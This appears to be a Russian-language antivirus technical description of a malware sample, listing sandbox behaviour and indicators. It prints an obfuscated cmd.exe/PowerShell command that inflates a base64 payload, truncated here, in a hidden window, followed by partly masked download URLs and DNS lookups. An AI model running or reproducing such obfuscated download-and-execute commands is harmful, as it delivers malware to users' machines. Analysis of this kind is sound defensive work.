Техническая информация
- '<SYSTEM32>\cmd.exe' cmd.EXE /C"SeT OpG= (NEW-objEcT sYsTem.Io.compressiON.DeflaTESTREaM([Io.MemORySTReaM] [CONvErT]::FroMbaSE64STRIng( 'TZBBa8JAEIX/Sg4La0jdHARpXQJiROqhPagghV6SzZisJrtxd2LahPz3bkShl4F535s3zJCdKSMF...
- 'st#####raightening.com':80
- 'fr###rfrance.fr':80
- 'ru##ur.ru':80
- 'ci#####smetics.com.br':80
- 'ci#####smetics.com.br':443
- http://st#####raightening.com/sDCqr
- http://www.fr###rfrance.fr/T
- http://ru##ur.ru/3dgheWz
- http://ci#####smetics.com.br/T
- 'ci#####smetics.com.br':443
- DNS ASK st#####raightening.com
- DNS ASK co###tic.net
- DNS ASK fr###rfrance.fr
- DNS ASK ru##ur.ru
- DNS ASK ci#####smetics.com.br
- '<SYSTEM32>\cmd.exe' cmd.EXE /C"SeT OpG= (NEW-objEcT sYsTem.Io.compressiON.DeflaTESTREaM([Io.MemORySTReaM] [CONvErT]::FroMbaSE64STRIng( 'TZBBa8JAEIX/Sg4La0jdHARpXQJiROqhPagghV6SzZisJrtxd2LahPz3bkShl4F535s3zJCdKSMF...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( ${ENV:`co`mspeC}[4,26,25]-joIn'' ) (( .( \"{0}{1}\" -f'ite','m' ) ( \"{2}{1}{0}\" -f'Opg',':','eNv' ) ).\"Val`UE\" )